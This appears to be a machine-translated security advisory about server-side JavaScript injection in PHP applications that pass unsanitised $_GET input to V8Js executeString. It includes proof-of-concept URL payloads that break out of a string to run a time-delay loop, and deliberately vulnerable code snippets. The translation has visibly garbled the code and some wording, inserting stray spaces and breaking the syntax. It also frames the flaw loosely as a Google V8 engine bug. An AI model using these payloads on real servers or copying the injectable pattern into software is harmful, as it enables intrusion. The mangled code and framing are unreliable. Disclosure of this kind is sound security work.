Google V8 server JavaScript injection vulnerability

Release date:
Updated on:

Affected Systems:
Google V8 JavaScript Engine
Description:
--------------------------------------------------------------------------------
Chromium is an open source Web browser project. V8 is Google's open-source JavaScript Engine.

Google's V8 server engine has an SSJS vulnerability in implementation. Attackers inject arbitrary code through the JavaScript injection vulnerability on the server in PHP.

<* Source: Felipe Aragon (felipe@syhunt.com)

Link: http://packetstormsecurity.org/files/110210/Google-V8-Server-Side-Javascript-Injection.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Vulnerable. php? Msg = A'; d % 20 = % 20new % 20 Date (); do {cd = new % 20 Date () ;}while (cd-d <10000 ); foo = 'bar

Vulnerable Code:

$ Msg = $ _ GET ['msg '];
$ V8 = new V8Js ();
$ V8-> executeString ("var msg = '$ msg';... some code ..");

Vulnerable. php? Msg = version (); d % 20 = % 20new % 20 Date (); do {cd = new % 20 Date () ;}while (cd-d <10000 ); foo = ('bar'

Vulnerable Code:

$ Msg = $ _ GET ['msg '];
$ V8 = new V8Js ();
$ JS = <EOT
Len = print ($ msg + "\ n ");
... Some code ..
EOT;

$ V8-> executeString ($ JS, 'Basic. js ');

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Google
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.google.com